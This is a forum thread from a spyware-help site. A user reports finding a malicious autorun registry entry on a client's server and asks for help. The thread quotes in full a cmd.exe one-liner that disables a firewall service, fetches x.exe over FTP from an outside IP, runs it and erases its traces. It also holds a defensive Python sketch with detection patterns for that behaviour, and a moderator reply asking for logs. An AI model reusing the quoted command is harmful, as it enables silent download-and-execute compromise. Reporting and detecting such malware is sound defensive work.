Spyware Warrior
Help with Spyware, Hijacking & Other Internet Nuisances

suspect infection

 
paulrw
Newbie


Joined: 05 Mar 2012
Last Visit: 05 Mar 2012
Posts: 1
Location: Liverpool England

Posted: Mon Mar 05, 2012 6:52 am    Post subject: suspect infection

Logging on to a client's server today I noticed a command window appear briefly. Hunting it down I found this in the registry (HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run):

c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 210.76.97.212> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get x.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&x.exe&x.exe&del cmd.txt /q /f&exi

which looks to me to be creating a command file to download and run a program, deleting itself after running. This is not found by the antivirus/malware programs I have run. Does anyone know of it, and anything else it may have left about the place?
I don't know if this is the correct place to post this, but it seems that if you don't know of it, maybe you should! The FTP site resolves to an address in China. I have deleted the registry key. I have also found some spurious users on the system with admin rights, so I presume this program is creating a backdoor to the system.
_________________
Paul Wilkie
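
An added example, not part of the original post or of any tool used on this forum: a Python triage sketch that splits a Run-key value like the one quoted above into its `&`-chained stages and flags the download-and-run pattern the poster describes. The sample values are constructed (192.0.2.10 is a documentation address), and `analyze`, `RULES` and the finding labels are hypothetical names.

```python
import re

# Constructed Run-key values for illustration; not real indicators.
SAMPLES = {
    "updater": r'"C:\Program Files\Vendor\updater.exe" /background',
    "suspect": (r"c:\windows\system32\cmd.exe /c net1 stop sharedaccess"
                r"&echo open 192.0.2.10> cmd.txt&echo user>> cmd.txt"
                r"&echo pass>> cmd.txt&echo binary >> cmd.txt"
                r"&echo get x.exe >> cmd.txt&echo bye >> cmd.txt"
                r"&ftp -s:cmd.txt&x.exe&del cmd.txt /q /f&exit"),
}

# One rule per behaviour visible in the quoted value; each is matched per stage.
RULES = [
    ("stops SharedAccess (firewall/ICS) service",
     re.compile(r"^net1?\s+stop\s+sharedaccess\b", re.I)),
    ("writes a script file with echo redirection",
     re.compile(r"^echo\s.*>{1,2}\s*\S+", re.I)),
    ("runs ftp from a script file", re.compile(r"^ftp(\.exe)?\s.*-s:\S+", re.I)),
    ("deletes a file afterwards", re.compile(r"^del\s", re.I)),
]

def analyze(value):
    """Report which behaviours a 'cmd /c a&b&c' autorun value chains together."""
    result = {"findings": [], "ftp_hosts": [], "fetched": [], "suspicious": False}
    m = re.search(r'cmd(?:\.exe)?"?\s+/c\s+(.*)', value, re.I)
    if not m:
        return result
    # Simplification: split on '&' only; quoting and '^' escapes are not handled.
    stages = [s.strip() for s in m.group(1).split("&") if s.strip()]
    for stage in stages:
        for label, rx in RULES:
            if rx.search(stage) and label not in result["findings"]:
                result["findings"].append(label)
        if (h := re.match(r"echo\s+open\s+([^\s>]+)", stage, re.I)):
            result["ftp_hosts"].append(h.group(1))
        if (g := re.match(r"echo\s+get\s+([^\s>]+)", stage, re.I)):
            result["fetched"].append(g.group(1))
    # A stage that launches a file named in an FTP "get" means download-and-run.
    launched = {s.split()[0].lower() for s in stages}
    if any(f.lower() in launched for f in result["fetched"]):
        result["findings"].append("executes the downloaded file")
    result["suspicious"] = len(result["findings"]) >= 2
    return result

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, analyze(value))
```

Feed it the value data exported from both the native and Wow6432Node Run keys; the extracted FTP host and fetched file name give you something concrete to search for in firewall logs and on disk.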
Cypher
Moderator


Joined: 05 Jul 2009
Last Visit: 16 Oct 2014
Posts: 4680
Location: Land Of The Leprechauns

Posted: Mon Mar 05, 2012 7:04 am

By posting just a description of your problems it is likely that your post will be passed by and you will not receive the help you're looking for.

We need to know what's running on your computer so that we can give you appropriate instructions, and this information is provided by DDS logs.

This thread will now be closed.

If you still need help, please start a new thread with:-

  • DDS logs.
  • Details of the problems you're experiencing.
  • Any messages or error codes you may have got.

If for any reason you can't run DDS, please let us know in your post.

Details for running a DDS scan can be found ........... HERE
_________________
Admin/Teacher at Malware Removal University
Member of...

All times are GMT - 8 Hours